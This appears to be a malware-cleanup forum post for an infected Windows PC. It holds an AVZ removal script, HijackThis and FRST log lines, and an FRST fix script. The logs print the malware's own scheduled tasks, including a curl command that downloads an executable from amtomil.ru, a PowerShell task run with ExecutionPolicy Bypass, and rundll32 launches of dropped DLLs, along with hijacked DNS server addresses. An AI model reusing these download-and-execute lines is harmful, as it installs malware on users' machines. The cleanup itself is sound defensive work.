begin
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
if not IsWOW64
then
begin
SearchRootkit(true, true);
SetAVZGuardStatus(True);
end;
QuarantineFile('C:\Users\AMD\AppData\Roaming\Microsoft\msi.exe','');
QuarantineFile('C:\Users\AMD\AppData\Roaming\curl\curl.exe','');
QuarantineFile('C:\Program Files (x86)\thzXuJvjU\ZzB5QsG.dll','');
QuarantineFile('C:\WINDOWS\c6dc8799cda1c3052092a351612294ad.ps1','');
QuarantineFile('C:\WINDOWS\rss\csrss.exe','');
DeleteFile('C:\WINDOWS\rss\csrss.exe','32');
DeleteFile('C:\WINDOWS\c6dc8799cda1c3052092a351612294ad.ps1','32');
DeleteFile('C:\WINDOWS\system32\Tasks\c6dc8799cda1c3052092a351612294ad','64');
DeleteFile('C:\Program Files (x86)\thzXuJvjU\ZzB5QsG.dll','32');
DeleteFile('C:\Users\AMD\AppData\Roaming\Microsoft\msi.exe','32');
ExecuteFile('schtasks.exe', '/delete /TN uuxHwpnMkRCRpJh.job" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN c6dc8799cda1c3052092a351612294ad" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN csrss" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN curls" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN fdd10e4d13eb145b13312c082d0ea9aa" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN MSI" /F', 0, 15000, true);
BC_Activate;
ExecuteSysClean;
ExecuteWizard('SCU', 2, 3, true);
BC_ImportALL;
RebootWindows(true);
end.
begin
CreateQurantineArchive(GetAVZDirectory+'quarantine.zip');
end.
R4 - HKU\S-1-5-21-2136459447-3471906867-1024948565-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Internet Explorer\SearchScopes\{FFEBBF0A-C22C-4172-89FF-45215A135AC7} - (no name) - (no URL)
O2-32 - BHO: Html5 geolocation provider - {9BFBA68E-E21B-458E-AE12-FE85E903D2C0} - (no file)
O2-32 - BHO: MRSearchPlugin - {8E8F97CD-60B5-456F-A201-73065652D099} - (no file)
O2-32 - BHO: YoutubeAdBlock - {C0D38E5A-7CF8-4105-8FE8-31B81443A114} - (no file)
O17 - HKLM\System\CSS\Services\Tcpip\..\{9f53359b-4e99-410d-ac02-0b9aa3894da4}: NameServer = 10.173.0.1
O17 - HKLM\System\CSS\Services\Tcpip\..\{b5bdd048-48d0-47b9-81d7-aedc41f1fb95}: NameServer = 178.132.6.57
O17 - HKLM\System\CSS\Services\Tcpip\..\{b5bdd048-48d0-47b9-81d7-aedc41f1fb95}: NameServer = 193.238.153.54
O17 - HKLM\System\CSS\Services\Tcpip\..\{b5bdd048-48d0-47b9-81d7-aedc41f1fb95}: NameServer = 46.101.28.31
O17 - HKLM\System\CSS\Services\Tcpip\..\{b5bdd048-48d0-47b9-81d7-aedc41f1fb95}: NameServer = 52.56.51.39
O17 - HKLM\System\CSS\Services\Tcpip\..\{b5bdd048-48d0-47b9-81d7-aedc41f1fb95}: NameServer = 82.202.226.203
O17 - HKLM\System\ControlSet001\Services\Tcpip\..\{9f53359b-4e99-410d-ac02-0b9aa3894da4}: NameServer = 10.173.0.1
O17 - HKLM\System\ControlSet001\Services\Tcpip\..\{b5bdd048-48d0-47b9-81d7-aedc41f1fb95}: NameServer = 178.132.6.57
O17 - HKLM\System\ControlSet001\Services\Tcpip\..\{b5bdd048-48d0-47b9-81d7-aedc41f1fb95}: NameServer = 193.238.153.54
O17 - HKLM\System\ControlSet001\Services\Tcpip\..\{b5bdd048-48d0-47b9-81d7-aedc41f1fb95}: NameServer = 46.101.28.31
O17 - HKLM\System\ControlSet001\Services\Tcpip\..\{b5bdd048-48d0-47b9-81d7-aedc41f1fb95}: NameServer = 52.56.51.39
O17 - HKLM\System\ControlSet001\Services\Tcpip\..\{b5bdd048-48d0-47b9-81d7-aedc41f1fb95}: NameServer = 82.202.226.203
O22 - Task (Ready): qn9SpIumt6 - C:\Program Files (x86)\S9YGPGPPyq\updengine.exe (file missing)
O22 - Task (Running): TnqpiRJoXWMCwN - C:\WINDOWS\system32\rundll32.exe "C:\Program Files (x86)\GXZiGyYLSHyU2\j23eY1B.dll",#1
O22 - Task (Running): uuxHwpnMkRCRpJh - C:\WINDOWS\system32\rundll32.exe "C:\Program Files (x86)\thzXuJvjU\ZzB5QsG.dll",#1
O22 - Task (Running): uuxHwpnMkRCRpJh2 - C:\WINDOWS\system32\rundll32.exe "C:\Program Files (x86)\thzXuJvjU\ZzB5QsG.dll",#1
O22 - Task (Ready): fdd10e4d13eb145b13312c082d0ea9aa - C:\WINDOWS\system32\sc.exe start fdd10e4d13eb145b13312c082d0ea9a
O22 - Task (Ready): c6dc8799cda1c3052092a351612294ad - C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -NonInteractive -ExecutionPolicy Bypass -File "C:\WINDOWS\c6dc8799cda1c3052092a351612294ad.ps1"
O22 - Task (Ready): csrss - C:\WINDOWS\rss\csrss.exe (file missing)
O22 - Task (Ready): curl - C:\Users\AMD\AppData\Roaming\curl\curl_7_54.exe -f -L http://amtomil.ru/f.exe -o C:\Users\AMD\AppData\Roaming\curl\curl.exe (file missing)
O22 - Task (Ready): curls - C:\Users\AMD\AppData\Roaming\curl\curl.exe (file missing)
O22 - Task (Ready): MSI - C:\Users\AMD\AppData\Roaming\Microsoft\msi.exe cnt=2 fts="Downloads\kmplayer_4_0_732-c24___.exe" (file missing)
Start::
CreateRestorePoint:
HKLM-x32\...\Run: [] => [X]
GroupPolicy: Restriction - Chrome <==== ATTENTION
GroupPolicy\User: Restriction <==== ATTENTION
S2 OtherSearch; rundll32.exe "C:\Program Files (x86)\S9YGPGPPyq\kl.dll",Svc [X] <==== ATTENTION
C:\Program Files (x86)\S9YGPGPPyq\kl.dll
2017-08-28 18:09 - 2017-08-31 00:35 - 000000000 ____D C:\Program Files (x86)\QYERbvxRHIE
2017-08-28 18:09 - 2017-08-28 18:12 - 000000000 ____D C:\Program Files (x86)\GXZiGyYLSHyU2
2017-08-28 18:09 - 2017-08-28 18:11 - 000000000 ____D C:\Program Files (x86)\thzXuJvjU
2017-08-28 18:09 - 2017-08-28 18:09 - 000000000 ____D C:\WINDOWS\SysWOW64\SSL
2017-08-28 18:08 - 2017-08-30 21:06 - 000000000 ____D C:\Users\AMD\AppData\Local\bd683f405ffc4694a7f13185c2a12105
2017-08-28 18:08 - 2017-08-28 18:19 - 000000000 ____D C:\Program Files (x86)\S9YGPGPPyq
2017-08-28 18:08 - 2017-08-28 18:18 - 000000000 ____D C:\Users\AMD\AppData\Local\5845cdd21afc4a209524bad837dcfa3a
2017-08-28 18:08 - 2017-08-28 18:10 - 000000000 ____D C:\Users\Все пользователи\245e0fcfe14f4ab697a1de5f1b36bdf8
2017-08-28 18:08 - 2017-08-28 18:10 - 000000000 ____D C:\ProgramData\245e0fcfe14f4ab697a1de5f1b36bdf8
2017-08-28 18:00 - 2017-08-30 21:06 - 000000000 ____D C:\Users\AMD\AppData\Roaming\c9c0d020105044ec8067fc5a5e953f1d
2017-08-28 18:00 - 2017-08-28 18:18 - 000000000 ____D C:\Users\Все пользователи\07e1088b9fe04728aee9fbbbc20a3bf3
2017-08-28 18:00 - 2017-08-28 18:18 - 000000000 ____D C:\ProgramData\07e1088b9fe04728aee9fbbbc20a3bf3
2017-08-28 18:00 - 2017-08-28 18:12 - 000000000 ____D C:\Users\AMD\AppData\Roaming\11e94b5b56294a17aa939a3536471968
2017-08-28 17:56 - 2017-08-28 18:13 - 000000000 ____D C:\Users\AMD\AppData\Roaming\curl
2017-08-28 17:53 - 2017-08-28 18:11 - 000000000 ____D C:\Users\AMD\AppData\Local\indexer
2017-08-28 17:46 - 2017-08-28 18:07 - 000003478 __RSH C:\WINDOWS\System32\Tasks\MSI
Task: {083A0758-E79E-48C4-A2D1-323337865B5A} - \FastDataX Task -> No File <==== ATTENTION
Task: {0B07A8EF-3E5B-46C8-9800-59BB7161785B} - System32\Tasks\MSI => C:\Users\AMD\AppData\Roaming\Microsoft\msi.exe <==== ATTENTION
Task: {48992818-BB30-4CF7-8B15-9989A9F742F8} - \SigmaTel Studio -> No File <==== ATTENTION
Task: {F87A589F-7178-4109-9507-A83CA728C455} - \indexer -> No File <==== ATTENTION
EmptyTemp:
Reboot:
End::
We use cookies and similar technologies for the following purposes:
Do you accept cookies and these technologies?
We use cookies and similar technologies for the following purposes:
Do you accept cookies and these technologies?